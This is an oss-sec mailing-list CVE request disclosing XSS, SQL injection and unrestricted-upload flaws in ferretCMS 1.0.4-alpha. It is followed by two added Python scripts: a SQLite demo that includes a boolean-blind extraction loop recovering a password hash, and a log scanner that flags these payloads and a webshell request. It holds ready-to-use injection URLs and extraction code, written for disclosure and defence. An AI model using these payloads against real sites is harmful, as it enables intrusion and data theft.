oss-sec mailing list archives

CVE-Request -- ferretCMS v.1.0.4-alpha -- Multiple reflected/stored XSS and SQLi vulnerabilities, unrestricted file upload


From: Steffen Rösemann <steffen.roesemann1986 () gmail com>
Date: Fri, 23 Jan 2015 07:14:56 +0100

Hi Josh, Steve, vendors, list.

I found multiple reflected/stored XSS and SQLi vulnerabilities as well as
an unrestricted file upload in ferretCMS v.1.0.4, which is currently
in the alpha development stage.

============
Reflected XSS
============

http://{TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

============
Stored XSS
============

1.
via the login form of the administrative backend, input field for username:

http://{TARGET}/admin.php

executed here, in the log event functionality of the backend:

http://{TARGET}/admin.php?type=log&action=read

2.

via the new blog post form, input field for page title:

http://{TARGET}/admin.php?type=page&action=insert&p=

executed, for example, here:

http://{TARGET}/admin.php?type=page&action=read

============
SQLi
============

http://{TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+

http://{TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+

http://{TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+

http://{TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+

http://{TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+

http://{TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+

http://{TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+

==================
Unrestricted file upload
==================

An administrator is able to upload arbitrary files via the form
located here on a standard ferretCMS installation:

http://{TARGET}/admin.php?type=uploader&action=upload

As these files aren't renamed and are stored in the following location, any
unauthenticated user is able to read/execute them, too:

http://{TARGET}/custom/uploads/{NAME_OF_THE_FILE}



Could you please assign a CVE-ID / CVE-IDs for these issues?

Thank you very much!

Greetings.

Steffen Rösemann

References:

[1] https://github.com/JRogaishio/ferretCMS
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
[3] https://github.com/JRogaishio/ferretCMS/issues/63
[4] https://github.com/sroesemann/ferretCMS
[5] http://seclists.org/fulldisclosure/2015/Jan/98
[6] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-10.html
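The following Python script is an added example, not code from ferretCMS or from the advisory above. It models the SQLi class reported for the `p` parameter on an in-memory SQLite database: a hypothetical handler that concatenates `p` into the query (the pattern the payloads imply), the advisory's UNION fingerprint payload run against it, a boolean-blind loop that generalises the last payload (`1 and substring(version(),1,1)=5`) to pull an arbitrary value out one character at a time, and a hardened handler that casts and binds the parameter so both payloads return nothing. The `page`/`account` tables, the column names and the hash value are constructed for the demo, and MySQL's `version()`/`substring()` are replaced by SQLite's `sqlite_version()`/`substr()` so it runs offline.

```python
import sqlite3


# Constructed demo schema; ferretCMS's real tables and queries are not known
# here and nothing below is taken from the project.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE page(id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT);
        INSERT INTO page VALUES (1, 'Home', 'Welcome', 'admin');
        CREATE TABLE account(id INTEGER PRIMARY KEY, username TEXT, pwhash TEXT);
        INSERT INTO account VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return con


def vulnerable_read(con, p):
    """Hypothetical unsafe handler: the 'p' query parameter is concatenated
    into the SQL text, which is the pattern the advisory's payloads imply."""
    sql = "SELECT id, title, body, author FROM page WHERE id = " + p
    return con.execute(sql).fetchall()


def safe_read(con, p):
    """Hardened form: reject anything that is not an integer, then bind it."""
    try:
        page_id = int(p)
    except ValueError:
        return []
    sql = "SELECT id, title, body, author FROM page WHERE id = ?"
    return con.execute(sql, (page_id,)).fetchall()


# The advisory's UNION payload after URL decoding ('+' is a space, %28/%29 are
# parentheses, the trailing '-- ' comments out the rest of the query), with
# MySQL's version() swapped for SQLite's sqlite_version() so the demo runs locally.
UNION_PAYLOAD = "1 and 1=2 union select 1,sqlite_version(),3,4 -- "


def blind_extract(oracle, subquery, alphabet="0123456789abcdef", max_len=64):
    """Boolean-blind extraction generalising the advisory's last payload
    (p=1 and substring(version(),1,1)=5): a probe returns the id=1 row only
    when the guessed character at `pos` is right, so a true/false oracle
    leaks the value one character at a time. SQLite's substr() stands in
    for MySQL's substring()."""
    value = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = f"1 and substr(({subquery}),{pos},1)='{ch}' -- "
            if oracle(probe):
                value += ch
                break
        else:
            break  # no candidate matched: the string has ended
    return value


def demo():
    con = make_db()
    union_rows = vulnerable_read(con, UNION_PAYLOAD)
    vuln_oracle = lambda p: len(vulnerable_read(con, p)) > 0
    safe_oracle = lambda p: len(safe_read(con, p)) > 0
    target = "select pwhash from account where username='admin'"
    return {
        # the second column of the injected row carries the fingerprint
        "union_second_column": union_rows[0][1],
        "sqlite_version": con.execute("select sqlite_version()").fetchone()[0],
        # the blind loop recovers the constructed admin hash from the other table
        "leaked_hash": blind_extract(vuln_oracle, target),
        # the same payloads against the hardened handler yield nothing
        "safe_union": safe_read(con, UNION_PAYLOAD),
        "safe_blind": blind_extract(safe_oracle, target),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The `1 and 1=2` prefix matters for the UNION payload: it suppresses the legitimate row so the injected row is the only one rendered into the page, which is why the fingerprint shows up where a title or body would. The boolean-blind variant works even when nothing from the result set is echoed, as long as "page rendered" versus "empty page" is distinguishable.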

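From the defender's side, the request shapes in this advisory are easy to recognise in web server logs. The script below is an added example, not part of the advisory or of ferretCMS: it parses combined-format access-log lines, URL-decodes each query parameter (so `+` and `%28` are handled the same way the payloads above encode them) and flags the reflected `<script>` injection, the UNION-based and substring-based SQLi probes, the MySQL fingerprint functions, and direct requests for server-side scripts under the unprotected `/custom/uploads/` directory. The log lines are constructed to replay the advisory's requests; the rule names and the upload extension list are the author's choices.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed access-log lines (combined format) replaying the advisory's
# request shapes; these are not real logs from any ferretCMS host.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Jan/2015:07:14:56 +0100] "GET /admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jan/2015:07:15:02 +0100] "GET /admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jan/2015:07:15:09 +0100] "GET /admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Jan/2015:07:16:30 +0100] "GET /custom/uploads/shell.php?cmd=id HTTP/1.1" 200 87 "-" "curl/7.38.0"
192.0.2.10 - - [23/Jan/2015:07:17:01 +0100] "GET /admin.php?type=page&action=read HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the payload classes in the advisory, applied to decoded values.
PARAM_RULES = {
    "reflected_xss": re.compile(r"<\s*script\b", re.I),
    "union_sqli": re.compile(r"\bunion\b[\s\S]*\bselect\b", re.I),
    "blind_sqli": re.compile(r"\b(?:and|or)\b\s+substr(?:ing)?\s*\(", re.I),
    "sql_fingerprint": re.compile(r"\b(?:version|database|user)\s*\(\s*\)", re.I),
}
# Direct hits on the unprotected upload directory with a server-side extension
# (extension list is an assumption for the demo).
UPLOAD_EXEC_RE = re.compile(r"^/custom/uploads/[^/]+\.(?:php\d?|phtml|phar)$", re.I)


def classify_request(target):
    """Return the set of rule names matched by one request target."""
    path, _, query = target.partition("?")
    path = unquote(path)
    hits = set()
    if UPLOAD_EXEC_RE.match(path):
        hits.add("upload_exec")
    # parse_qsl decodes '+' as space and %XX escapes, matching the advisory's
    # encoding, and splits name/value on the first '=' only, so payloads that
    # contain '=' (1=2) stay in one value.
    for _, value in parse_qsl(query, keep_blank_values=True):
        for name, rx in PARAM_RULES.items():
            if rx.search(value):
                hits.add(name)
    return hits


def scan(log_text):
    """Return (ip, target, sorted hits) for each line matching at least one rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m.group("target"))
        if hits:
            findings.append((m.group("ip"), m.group("target"), sorted(hits)))
    return findings


if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(ip, ",".join(hits), target)
```

Decoding before matching is the point: the raw log line contains `%3Cscript%3E` and `substring%28`, which a rule written against literal `<script>` or `substring(` would miss. The upload rule is also a useful canary after patching, since a 200 on `/custom/uploads/*.php` means a file is already there.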